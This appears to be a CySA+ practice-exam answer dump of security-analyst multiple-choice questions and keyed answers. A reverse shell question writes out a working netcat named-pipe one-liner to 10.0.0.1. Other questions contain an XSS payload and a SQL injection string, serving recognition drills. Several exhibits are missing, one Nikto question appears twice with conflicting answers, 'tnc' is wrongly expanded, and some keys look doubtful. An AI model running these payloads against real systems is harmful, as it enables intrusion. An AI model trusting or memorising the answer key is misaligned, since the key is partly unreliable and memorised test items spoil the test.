CYSA Questions 361-580

When investigating a potentially compromised host, an analyst observes that the process BGInfo.exe (PID 1024), a Sysinternals tool used to create desktop backgrounds containing host details, has been running for over two days. Which of the following activities will provide the best insight into this potentially malicious process, based on the anomalous behavior? A. Changes to system environment variables B. SMB network traffic related to the system process C. Recent browser history of the primary user D. Activities taken by PID 1024

Activities taken by PID 1024

A security analyst has found a moderate-risk item in an organization's point-of-sale application. The organization is currently in a change freeze window and has decided that the risk is not high enough to correct at this time. Which of the following inhibitors to remediation does this scenario illustrate? A. Service-level agreement B. Business process interruption C. Degrading functionality D. Proprietary system

Business process interruption

An auditor is reviewing the evidence log associated with a cyber crime. The auditor notices that a gap exists between individuals who were responsible for holding onto and transferring the evidence between individuals responsible for the investigation. Which of the following best describes the evidence handling process that was not properly followed? A. Validating data integrity B. Preservation C. Legal hold D. Chain of custody

Chain of custody

A security analyst is improving an organization's vulnerability management program. The analyst cross-checks the current reports with the system's infrastructure teams, but the reports do not accurately reflect the current patching levels. Which of the following will most likely correct the report errors? A. Updating the engine of the vulnerability scanning tool B. Installing patches through a centralized system C. Configuring vulnerability scans to be credentialed D. Resetting the scanning tool's plug=ins to default

Configuring vulnerability scans to be credentialed

A security analyst detects an email server that had been compromised in the internal network. Users have been reporting strange messages in their email inboxes and unusual network traffic. Which of the following incident response steps should be performed next? A. Preparation B, Validation C. Containment D. Eradication

Containment

SIMULATION An organization has noticed large amounts of data are being sent out of its network. An analyst is identifying the cause of the data exfiltration. INSTRUCTIONS Select the command that generated the output in tabs 1 and 2 Review the output text in all tabs and identify the file responsible for the malicious behavior If at any time you would like to bring back the initial state of the simulation, please click the reset all button

Command generating the output in Tab 1 - netstat -bo Command generating the output in Tab 2 -tasklist File responsible for malicious behavior -cmd.exe

A vulnerability analyst is writing a report documenting the newest, most critical vulnerabilities identified in the past month. Which of the following public MITRE repositories would be best to review? A. Cyber Threat Intelligence B. Common Vulnerabilities and Exposures C. Cyber Analytics Repository D. ATT&CK

Common Vulnerabilities and Exposures

An analyst produces a weekly endpoint status report for the management team. The report includes specific details for each endpoint in relation to organizational baselines. Which of the following best describes the report type? A. Forensics B. Mitigation C. Vulnerability D. Compliance

Compliance

Which of the following best describes the external requirements that are imposed for incident management communication? (choose two) A. Law enforcement involvement B. Compliance with regulatory requirements C. Transparency to stockholders D. Defined SLAs regarding services E. Industry advocacy group participation F. Framework guidelines

Compliance with regulatory requirements, Framework guidelines

A security analyst needs to identify a computer based on the following requirements to be mitigated: - The attack method is network based with low complexity - No privileges or user action is needed - The confidentiality and availability level is high, with a low integrity level Given the following CVSS 3.1 output: Computer1: CVSS3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:H Computer2: CVSS3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H Computer3: CVSS3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:H Computer4: CVSS3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H Which of the following machines should the analyst mitigate? A. Computer 1 B. Computer 2 C. Computer 3 D. Computer 4

Computer 4

While a security analyst for an organization was reviewing logs from web servers, the analyst found several successful attempts to downgrade HTTPS sessions to use cipher modes of operation susceptible to padding oracle attacks. Which of the following combinations of configuration changes should the organization make to remediate this issue? (choose two) A. Configure the server to prefer TLS 1.3 B. Remove cipher suites that uses CBC C. Configure the server to prefer ephemeral modes for key exchange D. Require client browsers to present a user certificate for mutual authentication E. Configure the server to require HSTS F. Remove cipher suites that use GCM

Configure the server to prefer TLS 1.3, Remove cipher suites that use CBC

In the last hour, a high volume of failed RDP authentication attempts have been logged on a critical server. All of the authentication attempts originated from the same remote IP address and made use of a single valid domain user account. Which of the following mitigating controls would be most effective to reduce the rate of success of this brute force attack? (choose two) A. Increase the granularity of log-on event auditing on all devices B. Enable host firewall rules to block all outbound traffic to TCP port 3389 C. Configure user account lockout after a limited number of failed attempts D. Implement a firewall block for the IP address of the remote system E. Install a third party remote access tool and disable RDP on all devices F. Block inbound to TCP port 3389 from untrusted remote IP addresses at the perimeter firewall

Configure user account lockout after a limited number of failed attempts, Block inbound to TCP port 3389 from untrusted remote IP addresses at the perimeter firewall

Thousands of computers were compromised. The compromise was detected on only three computers during the latest vulnerability scan. An analyst conducts an after actions review to determine why the vulnerability was not detected on more computers. The analyst recreates the following configuration that was used to scan the network: Which of the following best explains the reason the vulnerability was found on only three computers? A. Incorrect remote port specified B. Lack of concurrent threads dedicated C. Use of a credentialed vulnerability scan D. Configuring an incorrect subnet mask

Configuring an incorrect subnet mask

Which of the following best describes the importance of implementing TAXII as part of a threat intelligence program? A. It provides a structured way to gain information about insider threats B. It proactively facilitates real-time information sharing between the public and private sectors C. It exchanges messages in the most cost-effective way and requires little maintenance once implemented D. It is a semi-automated solution to gather threat intelligence about competitors in the same sector

It proactively facilitates real-time information sharing between the public and private sector

Which of the following most accurately describes the Cyber Kill Chain methodology? A. It is used to correlate events to ascertain the TTPs of an attacker B. It is used to ascertain lateral movements of an attacker, enabling the process to be stopped C. It provides a clear model of how an attacker generally operates during an intrusion and the actions to take at each stage D. It outlines a clear path for determining the relationships between the attacker, the technology used, and the target

It provides a clear model of how an attacker generally operates during an intrusion and the actions to take at each stage

Which of the following best describes root cause analysis? A. It describes the tactics, techniques, and procedures used in an incident B. It provides a detailed path outlining the origin of an issue and how to eliminate it permanently. C. It outlines the who-what-when-where-why, which is often used in conjunction with legal proceedings D. It generates a report of ongoing activities, including what was done, what is being done, and what will be done next

It provides a detailed path outlining the origin of an issue and how to eliminate it permanently

Which of the following is a benefit of the Diamond Model of Intrusion Analysis? A. It provides analytical pivoting and identifies knowledge gaps B. It guarantees that the discovered vulnerability will not be exploited again in the future C. It provides concise evidence that can be used in court D. It allows for proactive detection and analysis of attack events

It provides analytical pivoting and identifies knowledge gaps

A Chief Information Security Officer has requested a dashboard to share critical vulnerability management goals with company leadership. Which of the following would be the best to include in the dashboard? A. KPI B. MOU C. SLO D. SLA

KPI

SIMULATION A company recently experienced a security incident, The security team has determined a user clicked on a link embedded in a phishing email that was sent to the entire company. The link resulted in a malware download, which was subsequently installed and run. INSTRUCTIONS Part 1 Review the artifacts associated with the security incident. Identify the name of the malware, the malicious IP address, and the date and time when the malware executable entered the organization Part 2 Review the kill chain items and select an appropriate control for each that would improve the security posture of the organization and would have helped to prevent this incident from occurring. Each control may only be used once, and not all controls will be used. If at any time you would like to bring back the initial state of the simulation, please click the Reset ALL button.

Kill Chain Item: Phishing email - Email filtering Active links - VPN Malicious website access - IP blocklist Malware download - Firewall file type filter Malware install - Restricted local user permissions Malware Executions - Updated antivirus File Encryption - Backups Identify the following: Malicious executable - Payroll/xlsx Malicious IP Address - 81.161.63.103 Date/Time malware entered organization - 1 Dec 2019 14:03:19

During a tabletop exercise, engineers discovered that an ICS could not be updated due to hardware versioning incompatibility. Which of the following is the most likely cause of this issue? A. Legacy system B. Business process interruption C. Degrading functionality D. Configuration management

Legacy system

A company is in the middle of an incident, and customer data has been breached. Which of the following should the company contact first? A. Media B. Public relations C. Law enforcement D. Legal

Legal

Which of the following entities should an incident manager work with to ensure correct processes and adhere to when communicating incident reporting to the general public, as a best practice? (choose two) A. Law enforcement B. Governance C. Legal D. Manager E. Public relations F. Human resources

Legal, Public relations

Following an attack, an analyst needs to provide a summary of the event to the Chief Information Security Officer. The summary needs to include the who-what-when information and evaluate the effectiveness of the plans in place. Which of the following incident management life cycle processes does this describe? A. Business continuity plan B. Lessons Learned C. Forensic analysis D. Incident response plan

Lessons learned

A security administrator has found indicators of dictionary attacks against the company's external-facing portal. Which of the following should be implemented to best mitigate the password attacks? A. Multifactor authentication B. Password complexity C. Web application firewall D. Lockout policy

Lockout policy

An analyst is reviewing a dashboard from the company's SIEM and finds that an IP address known to be malicious can be tracked to numerous high-priority events in the last two hours. The dashboard indicates that these events relate to TTPs. WHich of the following is the analyst most likely using? A. MITRE ATT&CK B. OSSTMM C. Diamond Model of Intrusion Analysis D. OWASP

MITRE ATT&CK

An analyst is reviewing a dashboard from the company's SIEM and finds that an IP address known to be malicious can be tracked to numerous high-priority events in the last two hours. The dashboard indicates that these events relate to TTPs. Which of the following is the analyst most likely using? A. MITRE ATT&CK B. OSSTMM C. Diamond Model of Intrusion Analysis

MITRE ATT&CK

Which of the following attack methodology frameworks should a cyber security analyst use to identify similar TTPs utilized by nation-state actors? A. Cyber kill chains B. Diamond Model of Intrusion Analysis C. OWASP testing guide D. MITRE ATT&CK matrix

MITRE ATT&CK matrix

A security analyst needs to identify an asset that should be remediated based on the following: Which of the following assets should the analyst remediate first? A. Mail server B. Domain controller C. Web server D. File server

Mail server

A security analyst runs tcpdump on the 10.203.10.22 machine and observes thousands of packets as shown below: Which of the following activites explains the tcpdump output? A. Incoming nmap -sA scan B. hping3 --udp scan over the network C. C2 communications leaving the network D. Malware beaconing

Malware beaconing

A security analyst finds an application that cannot enforce the organization's password policy. An exception is granted. As a compensating control, all users must confirm that their passwords comply with the organization's policy. Which of the following types of compensating controls is the organization using? A. Corrective B. Managerial C. Technical D. Detective

Managerial

Which of the following is the best metric to use when reviewing and addressing findings that caused an incident? A. Mean time to restore B. Mean time to respond C. Mean time to remediate D. Mean time to detect

Mean time to remediate

An analyst is evaluating the vulnerability report: Which of the following vulnerability report sections provides information about the level of impact on data confidentiality if a successful exploitation occurs? A. Payloads B. Metrics C. Vulnerability D. Profile

Metrics

A security analyst needs to develop a situation to protect a high-value asset from an exploit like a recent zero-day attack. Which of the following best describes the risk management strategy? A. Avoid B. Transfer C. Accept D. Mitigate

Mitigate

A security analyst has identified outgoing network traffic leaving the enterprise at odd times. The traffic appears to pivot across network segments and target domain servers. The traffic is then routed to a geographic location to which the company has no association. Which of the following best describes this type of threat? A. Hacktivist B. Zombie C. Insider threat D. Nation-state actor

Nation-state actor

An organization is planning to adopt a zero-trust architecture. Which of the following is most aligned with this approach? A. Network segmentation to separate sensitive systems from the rest of the network B. Whitelisting specific IP addresses that are allowed to access the network C. Trusting users who successfully authenticate once with multifactor authentication D. Automatically trusting internal network communications over external traffic

Network segmentation to separate sensitive systems from the rest of the network

The Chief Information Security Officer wants the same level of security to be present whether a remote worker logs in at home or at a coffee shop. Which of the following should be recommended as a starting point? A. Non-persistent virtual desktop infrastructures B. Passwordless authentication C. Standard-issue laptops D. Serverless workloads

Non-persistent virtual desktop infrastructures

An analyst is designing a message system for a bank. The analyst wants to include a feature that allows the recipient of a message to prove to a third party that the message came from the sender. Which of the following information security goals is the analyst most likely trying to achieve? A. Non-repudiation B. Authentication C. Authorization D. Integrity

Non-repudiation

A development team is preparing to roll out a beta version of a web application and wants to quickly test for vulnerabilities, including SQL injection, path traversal, and cross-site scripting. Which of the following tools would the security team most likely recommend to perform this test? A. Has heat B. OpenVAS C. OWASP ZAP D. Nmap

OWASP ZAP

An analyst is conducting monitoring against an authorized team that will perform adversarial techniques. The analyst interacts with the team twice per day to set the stage for techniques to be used. Which of the following teams is the analyst a member of? A. Orange Team B. Blue Team C. Red Team D. Purple Team

Orange Team

A company classifies security groups by risk level. Any group with high-risk classification requires multiple levels of approval for member or owner changes. Which of the following inhibitors to remediation is the company utilizing? A. Organizational governance B. MOU C. SLA D. Business process interruption

Organizational governance

Which of the following characteristics ensures the security of an automated information system is the most effective and economical? A. Originally designed to provide necessary security B. Subjected to intense security testing C. Customized to meet specific security threats D. Optimized prior to the addition of security

Originally designed to provide necessary security

Several incidents have occurred with a legacy web application that has had little development work completed. Which of the following is the most likely cause of the incidents? A. Misconfigured web application firewall B. Data integrity failure C. Outdated libraries D. Insufficient logging

Outdated libraries

A security analyst is conducting a vulnerability assessment of a company's online store. The analyst discovers a critical vulnerability in the payment processing system that could be exploited, allowing attackers to steal customer payment information. Which of the following should the analyst do next? A. Leave the vulnerability unpatched until the next scheduled maintenance window to avoid potential disruption to business B. Perform a risk assessment to evaluate the potential impact of the vulnerability and determine whether additional security measures are needed C. Ignore the vulnerability since the company recently passed a payment system compliance audit D. Patch the vulnerability as soon as possible to ensure customer payment information is secure

Patch the vulnerability as soon as possible to ensure customer payment information is secure

An organization is conducting a pilot deployment of an e-commerce application. The application's source code is not available. Which of the following strategies should an analyst recommend to evaluate the security of the software? A. Static testing B. Vulnerability testing C. Dynamic testing D. Penetration testing

Penetration testing

Which of the following choices is most likely to cause obstacles in vulnerability remediation? A. Not meeting an SLA B. Patch prioritization C. Organizational governance D. Proprietary systems

Proprietary systems

Which of the following evidence collection methods is most likely to be acceptable in court cases? A. Copying all access files at the time of the incident B. Creating a file-level archive of all files C. Providing a full system backup inventory D. Providing a bit-level image of the hard drive

Providing a bit level image of the hard drive

After a recent vulnerability report for a server is presented, a business must decide whether to secure the company's web-based storefront or shut it down. The developer is not able to fix the zero-day vulnerability because a patch does not exist yet. Which of the following is the best option for the business? A. Limit the API request for new transactions until a patch exists B. Take the storefront offline until a patch exists C. Identify the degrading functionality D. Put a WAF in front of the storefront

Put a WAF in front of the storefront

Which of the following is the appropriate phase in the incident response process to perform a vulnerability scan to determine the effectiveness of corrective actions? A. Lessons learned B. Reporting C. Recovery D. Root cause analysis

Recovery

Which of the following are process improvements that can be realized by implementing a SOAR solution? (choose two) A. Minimize security attacks B. Itemize tasks for approval C. Reduce repetitive tasks D. Minimize setup complexity E. Define a security strategy F. Generate reports and metrics

Reduce repetitive tasks, Generate reports and metrics

A system that provides the user interface for a critical server has potentially been corrupted by malware. Which of the following is the best recommendation to ensure business continuity? A. System isolation B. Reimaging C. Malware removal D. Vulnerability scanning

Reimaging

Which of the following is a KPI that is used to monitor or report on the effectiveness of an incident response reporting and communication program? A. Incident volume B. Mean time to detect C. Average time to patch D. Remediated incidents

Remediated incidents

A security analyst detected the following suspicious activity: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f Which of the following most likely describes the activity? A. Network pivoting B. Host scanning C. Privilege escalation D. Reverse Shell

Reverse Shell

An incident responder was able to recover a binary file through the network traffic. The binary file was also found in some machines with anomalous behavior. Which of the following processes most likely can be performed to understand the purpose of the binary file? A. File debugging B. Traffic analysis C. Reverse engineering D. Machine isolation

Reverse engineering

Which of the following responsibilities does the legal team have during an incident management event? (choose two) A. Coordinate additional or temporary staffing for recovery efforts B. Review and approve new contracts acquired as a result of an event C. Advise the incident response team on matters related to regulatory reporting D. Ensure all system security devices and procedures are in place E. Conduct computer and network damage assessments for insurance F. Verify that all security personnel have the appropriate clearances

Review and approve new contracts acquired as a result of an event, Advise the incident response team on matters related to regulatory reporting

A security analyst needs to identify services in a small, critical infrastructure ICS network. Many components in the network are likely to break if they receive malformed or unusually large requests. Which of the following is the safest method to use when identifying service versions? A. Use nmap sV to identify all assets on the network B. Use Burp Suite to conduct service identification C. Use nc to manually perform banner grabbing D. Use Nesses with restricted concurrent connections

Use Nesses with restricted concurrent connections

An employee received a phishing email that contained malware targeting the company. Which of the following is the best way for a security analyst to get more details about the malware and avoid disclosing information? A. Upload the malware to the VirusTotal website B. Share the malware with the EDR provider C. Hire an external consultant to perform the analysis D. Use a local sandbox in a microsegmented environment

Use a local sandbox in a microsegmented environment

An end user forwarded an email with a file attachment to the SOC for review. The SOC analysts think the file was specifically crafted for the target. Which of the following investigative actions would best determine if the attachment was malicious? A. Review the file in Virus total to determine if the domain is associated with any phishing B. Review the email header to analyze the DKIM, DMARC, and SPF values C. Review the source IP address in AbuseIPDB D. Review the attachment's behavior in a sandbox environment while running Wireshark

Review the attachment's behavior in a sandbox environment while running Wireshark

An attacker recently gained unauthorized access to a financial institution's database, which contains confidential information. The attacker exfiltrated a large amount of data before being detected and blocked. A security analyst needs to complete a root cause analysis to determine how the attacker was able to gain access. Which of the following should the analyst perform first? A. Document the incident and any findings related to the attack for future reference B. Interview employees responsible for managing the affected systems C. Review the log files that record all events related to client applications and user access D. Identify the immediate actions that need to be taken to contain the incident and minimize damage

Review the log files that record all events related to client applications and user access

Which of the following ensures that a team receives simulated threats to evaluate incident response performance and coordination? A. Vulnerability assessment B. Incident response playbooks C. Tabletop exercise D. Cybersecurity frameworks

Tabletop exercise

A threat intelligence analyst is updating a document according to the MITRE ATT&CK framework. The analyst selects the following behavior from a malicious actor: "The malicious actor will attempt to achieve unauthorized access to the vulnerable system" In which of the following phases should the analyst include the detection? A. Procedures B. Techniques C. Tactics D. Subtechniques

Tactics

A security analyst is responding to an incident that involves a malicious attack on a network data closet. Which of the following best explains how the analyst should properly document the incident? A. Back up the configuration file for alt network devices B. Record and validate each connection C. Create a full diagram of the network infrastructure D. Take photos of the impacted items

Take photos of the impacted items

After updating the email client to the latest patch, only about 15% of the workforce is able to use email. Windows 10 users do not experience issues, but Windows 11 users have constant issues. Which of the following did the change management team fail to do? A. Implementation B. Testing C. Rollback D. Validation

Testing

Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastructure are discovered. Which of the following is the best solution to decrease the inconsistencies? A. Implementing credentialed scanning B. Changing from a passive to an active scanning approach C. Implementing a central place to manage IT assets D. Performing agentless scanning

Implementing a central place to manage IT assets

A security analyst found the following vulnerability on the company's website: <INPUT TYPE="IMAGE" SRC="javascript:alert('test');"> Which of the following should be implemented to prevent this type of attack in the future? A. Input sanitization B. Output encoding C. Code Obfuscation D. Prepared statements

Input sanitization

A security analyst is assisting a software engineer with the development of a custom log collection and alerting tool (SIEM) for a proprietary system. The analyst is concerned that the tool will not detect known attacks and behavioral IoCs. Which of the following should be configured in order to resolve this issue? A. Randomly generate and store all possible hash values B. Create a default rule to alert on any change to the system C. Intergrate with an open-source threat intelligence feed D. Manually add known threat signatures into the tool

Integrate with an open-source threat intelligence feed

Executives at an organization email sensitive financial information to external business partners when negotiating valuable contracts. To ensure the legal validity of these messages, the cybersecurity team recommends a digital signature be added to emails sent by the executives. Which of the following are the primary goals of this recommendation? (choose two) A. Confidentiality B. Integrity C. Privacy D. Anonymity E. Non-repudiation F. Authorization

Integrity, Non-repudiation

Which of the following best explains the importance of utilizing an incident response playbook? A. It prioritizes the business-critical assets for data recovery B. It establishes actions to execute when inputs trigger an event C. It documents the organization asset management and configuration D. It defines how many disaster recovery sites should be staged

It establishes actions to execute when inputs trigger an event

Which of the following is the most important reason for an incident response team to develop a formal incident declaration? A. To require that an incident be reported through the proper channels B. To identify and document staff who have the authority to declare an incident C. To allow for public disclosure of a security event impacting the organization D. To establish the department that is responsible for responding to an incident

To identify and document staff who have the authority to declare an incident

Which of the following best describes the key goal of the containment stage of an incident response process? A. To limit further damage from occurring B. To get services back up and running C. To communicate goals and objectives of the incident response plan D. To prevent data follow-on actions by adversary exfiltration

To limit further damage from occurring

Which of the following best explains the importance of network microsegmentation as part of a zero trust architecture? A. To allow policies that are easy to manage and less granular B. To increase the costs associated with regulatory compliance C. To limit how far an attack can spread D. To reduce hardware costs with the use of virtual appliances

To limit how far an attack can spread

Which of the following best describes the importance of KPIs in an incident response exercise? A. To identify the personal performance of each analyst B. To describe how incidents were resolved C. To reveal what the team needs to prioritize D. To expose which tools should be used

To reveal what the team needs to prioritize

Executives want to compare certain metrics from the most recent and last reporting periods to determine whether the metrics are increasing or decreasing. Which of the following would provide the necessary information to satisfy this request? A. Count level B. Trending analysis C. Impact assessment D. Severity score

Trending analysis

An incident response team is assessing attack vectors of malware that is encrypting data with ransomware. There are no indications of a network-based intrusion. Which of the following is the most likely root cause of the incident? A. USB drop B. LFI C. Cross-site forgery D. SQL injection

USB drop

During normal security monitoring activities, the following activity was observed: cd C:\Users\Documents\HR\Employees takedown/f .* SUCCESS: Which of the following best describes the potentially malicious activity observed? A. Registry changes or anomalies B. Data exfiltration C. Unauthorized privileges D. File configuration changes

Unauthorized privileges

Several critical bugs were identified during a vulnerability scan. The SLA risk requirement is that all critical vulnerabilities should be patched within 24 hours. After sending a notification to the asset owners, the patch cannot be deployed due to planned, routine system upgrades. Which of the following is the best method to remediate the bugs? A. Reschedule the upgrade and deploy the patch B. Request an exception to exclude the patch from the installation C. Update the risk register and request a change to the SLA D. Notify the incident response team and rerun the vulnerability scan

Update the risk register and request a change to the SLA

An organization has a critical financial application hosted online that does not allow event logging to send to the corporate SIEM. Which of the following is the best option for the security analyst to configure to improve the efficiency of security operations? A. Configure a new SIEM specific to the management of hosted environments B. Subscribe to a threat feed related to the vendor's application C. Use a vendor provided API to automate pulling the logs in real time D. Download and manually import the logs outside of business hours

Use a vendor provided API to automate pulling the logs in real time

A SOC analyst wants to improve the proactive detection of malicious emails before they are delivered to the destination inbox. Which of the following is the best approach the SOC analyst can recommend? A. Install UEBA software on the network B. Validate and quarantine emails with invalid DKIM and SPF headers C. Implement an EDR system on each endpoint D. Deploy a DLP platform to block unauthorized and suspicious content

Validate and quarantine emails with invalid DKIM and SPF headers

K company has recently experienced a security breach via a public-facing service. Analysis of the event on the server was traced back to the following piece of code: SELECT ' From userjdata WHERE Username = 0 and userid8 1 or 1=1;-- Which of the following controls would be best to implement? A. Deploy a wireless application protocol B. Remove the end-of-life component C. Implement proper access control D. Validate user input

Validate user input

During the rollout of a patch to the production environment, it was discovered that required connections to remote systems are no longer possible. Which of the following steps would have most likely revealed this gap? A. Implementation B. User acceptance testing C. Validation D. Rollback

Validation

A report contains IoC and TTP information for a zero-day exploit that leverages vulnerabilities in a specific version of a web application. Which of the following actions should a SOC analyst take first after receiving the report? A. Implement a vulnerability scan to determine whether the environment is at risk B. Block the IP addresses and domains from the report in the web proxy and firewalls C. Verify whether the information is relevant to the organization D. Analyze the web application logs to identify any suspicious or malicious activity

Verify whether the information is relevant to the organization

A vulnerability scan of a web server that is exposed to the internet was recently completed. A security analyst is reviewing the resulting vector strings: Which of the following vulnerabilities should be patched first? A. Vulnerability 1 B. Vulnerability 2 C. Vulnerability 3 D. Vulnerability 4

Vulnerability 1

A security manager is looking at third-party vulnerability metric (SMITTEN) to improve upon the company's current method that relies on CVSSv3. Given the following: Which of the following vulnerabilities should be prioritized? A. Vulnerability 1 B. Vulnerability 2 C. Vulnerability 3 D. Vulnerability 4

Vulnerability 2

A disgruntled open-source developer has decided to sabotage a code repository with a logic bomb that will act as a wiper. Which of the following parts of the Cyber Kill Chain does this act exhibit? A. Reconnaissance B. Weaponization C. Exploitation D. Installation

Weaponization

Which of the following would most likely be used to update a dashboard that integrates with multiple vendor tools? A. Webhooks B. Extensible Markup Language C. Threat feed combination D. JavaScript Object Notation

Webhooks

A network security analyst for a large company noticed unusual network activity on a critical system. Which of the following tools should the analyst use to analyze network traffic to search for malicious activity? A. WAF B. Wireshark C. EDR D. Nmap

Wireshark

A SOC team lead occasionally collects some DNS information for investigations. The team lead assigns this task to a new junior analyst. Which of the following is the best way to relay the process information to the junior analyst? A. Ask another team member to demonstrate their process B. Email a link to a website that shows someone demonstrating a similar process C. Let the junior analyst research and develop a process D. Write a step-by-step document on the team wiki outlining the process

Write a step-by-step document on the team wiki outlining the process

Which of the following makes STIX and OpenIoC information readable by both humans and machines? A. XML B. URL C. OVAL D. TAXII

XML

A security analyst reviews the following results of a Nikto scan: Which of the following should the security administrator investigate next? A. tiki B. phpList C. shtml.exe D. sshome

phpList

A security analyst reviews the following Nikto scan: Which of the following should the security administrator investigate next? A. tiki B. phpList C. shtml.exe D. sshome

shtml.exe

An anlyst is trying to capture anomalous traffic from a compromised host. Which of the following are the best tools for achieving this objective? (choose two) A. tcpdump B. SIEM C. Vulnerability scanner D. Wireshark E. Nmap F. SOAR

tcpdump, Wireshark

After an upgrade to a new EDR, a security analyst received reports that several endpoints were not communicating with the SaaS provider to receive critical threat signatures. To comply with the incident response playbook, the security analyst was required to validate connectivity to ensure communications. The security analyst ran a command that provided the following output: ComputerName: comptia007 RemotePort: 443 InterfaceAlias: Ethernet 3 TcpTestSucceeded: False Which of the following did the analyst use to ensure connectivity? A. nmap B. tnc C. ping D. tracert

tnc (trusted network communications)

A web application has a function to retrieve content from an internal URL to identify CSRF attacks in the logs. The security analyst is building a regular expression that will filter out the correctly formatted requests. The target URL is https://10.1.2.3/api, and the receiving API only accepts GET requests and uses a single integer argument named "id". Which of the following regular expressions should the analyst use to achieve the objectives? A. (?https://10\.1\.2\.3/api\?id=[0-9]+) B. "https://10\.1\.2\.3/api\?id=\d+ C. (?:"https://10\.1\.2\.3/api\?id-[0-9]+) D. https://10\.1\.2\.3/api\?id**0-9J$

"https://10\.1\.2\.3/api\?id=\d+

A user is suspected of violating policy by logging in to a Linux VM during non-business hours. Which of the following system files is the best way to track the user's activities? A. /var/log/secure B. /etc/motd C. /var/log/messages D. /etc/password

/var/log/secure

A junior security analyst opened ports on the company's firewall, and the company experienced a data breach. Which of the following most likely caused the data breach? A. Environmental hacktivist B. Accidental insider threat C. Nation-state D. Organized crime group

Accidental insider threat

An analyst views the following log entries: The organization has a partner vendor with hosts in the 216.122.5.x range. This partner vendor is required to have access to monthly reports and is the only external vendor with authorized access. The organization prioritizes incident investigation according to the following hierarchy: - unauthorized data disclosure is more critical than denial of service attempts - which are more important than ensuring vendor data access Based on the log files and the organization's priorities, which of the following hosts warrants additional investigation? A. 121.19.30.221 B. 134.17.188.5 C. 202.180.1582 D. 216.122.5.5

121.19.30.221

An organization has tracked several incidents that are listed on the following table: Which of the following is the organization's MTTD? A. 140 B. 150 C. 160 D. 180

160

SIMULATION A systems administrator is reviewing the output of a vulnerability scan Instructions Review the information in each tab Based on the organizations environment architecture and remediation standards, select the server to be patched within 14 days and select the appropriate technique and mitigation

192.168.60.5 Patch; upload signed certificate from trusted third party provider

A company patches its servers using automation software. Remote SSH or RDP connections are allowed to servers only from the service account used by the automation software. All servers are in an internal subnet without direct access to or from the internet. An analyst reviews the following vulnerability summary: Which of the following vulnerability IDs should the analyst address first? A. 1 B. 2 C. 3 D. 4

2

A security analyst needs to prioritize vulnerabilities for patching. Given the following vulnerability and system information: Which of the following systems should the analyst patch? A.1 B.2 C.3 D.4 E.5 F.6

3

A security analyst working for an airline is prioritizing vulnerabilities found on a system. The system has the following requirements: - Can store periodically audited documents required for takeoffs and landings - Can keep critical records regarding the company's operations - Data can be made public upon request and authorization Which of the following vulnerabilities should be remediated first? A. A broken access control vulnerability impacting data integrity B. A heap overflow vulnerability impacting the system's usability C. A DoS vulnerability impacting the system's availability D. A zero-day vulnerability impacting the system's confidentiality

A broken access control vulnerability impacting data integrity

A systems administrator needs to gather security events with repeatable patterns from Linux log files. Which of the following would the administrator most likely use for this task? A. A regular expression in Bash B. Filters in the vi editor C. Variables in a PowerShell script D. A playbook in a SOAR tool

A regular expression in Bash

A security analyst is reviewing the logs of a web server and notices that an attacker has attempted to exploit a SQL injection vulnerability. Which of the following tools can the analyst use to analyze the attack and prevent future attacks? A. A web application firewall B. A network intrusion detection system C. A vulnerability scanner D. A web proxy

A web application firewall

A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify the other in the event that a threat is detected. Which of the following should the analyst utilize to best accomplish this goal? A. SMB Share B. API endpoint C. SMTP notification D. SNMP trap

API endpoint

Which of the following is most appropriate to use with SOAR when the security team would like to automate actions across different vendor platforms? A. STIX/TAXII B. APIs C. Data enrichment D. Threat feed

APIs

A Chief Information Security Officer has decided the cost to protect an asset is greater than the cost of losing the asset. Which of the following risk management principles is the CISO following? A. Accept B. Avoid C. Transfer D. Mitigate

Accept

Which of the following risk management decisions should be considered after evaluating all other options? A. Transfer B. Acceptance C. Mitigation D. Avoidance

Acceptance

A SOC analyst observes reconnaissance activity from an IP address. The activity follows a pattern of short bursts toward a low number of targets. An open-source review shows that the IP has a bad reputation. The perimeter firewall logs indicate inbound traffic was allowed. The designation hosts are high-value assets with EDR agents installed. Which of the following is the best action for the SOC to take to protect against any further activity from the source IP? A. Add the IP address to the EDR deny list B. Create a SIEM signature to trigger on any activity from the source IP subnet detected by the web proxy or firewalls for immediate notification C. Implement a prevention policy for the IP on the WAF D. Activate the scan signatures for the IP on the NGFWs

Add the IP address to the EDR deny list

While performing a dynamic analysis of a malicious file, a security analyst notices the memory address changes every time the process runs. Which of the following controls is most likely preventing the analyst from finding the proper memory address of the piece of malicious code? A. Address space layout randomization B. Data execution prevention C. Stack canary D. Code Obfuscation

Address space layout randomization

Which of the following is instituting a security policy that users must lock their systems when stepping away from their desks an example of? A. Configuration management B. Compensating control C. Awareness, education, and training D. Administrative control

Administrative control

The Chief Executive Officer (CEO) has been notified that a confidential trade secret has been compromised. Which of the following communication plans should the CEO initiate? A. Alert department managers to speak privately with affected staff B. Schedule a press release to inform other service provider customers of the compromise C. Disclose to all affected parties in the Chief Operating Officer for discussion and resolution D. Verify legal notification requirements of PII and SPII in the legal and human resource departments

Alert department managers to speak privately with affected staff

During a training exercise, a security analyst must determine the vulnerabilities to prioritize. The analyst reviews the following vulnerability scan output: Which of the following issues should the analyst address first? A. Allows anonymous read access to /etc/password B. Allows anonymous read access via and FTP connection C. Microsoft Defender security definition updates disabled D. Less command allows for escape exploit via terminal

Allows anonymous read access to /etc/password

A security analyst is reviewing events that occurred during a possible compromise. The analyst obtains the following log: Which of the following is most likely occurring, based on the events in the log? A. An adversary is attempting to find the shortest path of compromise B. An adversary is performing a vulnerability scan C. An adversary is escalating privileges D. An adversary is performing a password stuffing attack

An adversary is performing a vulnerability scan

An analyst receives an alert for suspicious IIS log activity and reviews the following entries: 2024-05-23 15:57:05 10.203.10.16 HEAT/ - 80 - 10.203.10.17 DirBuster - 1.0- RCI+(http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project) Which of the following will the analyst infer from the logs? A. An attacker is performing network lateral movement B. An attacker is conducting reconnaissance of the website C. An attacker is exfiltrating data from the network D. An attacker is cloning the website

An attacker is conducting reconnaissance of the website

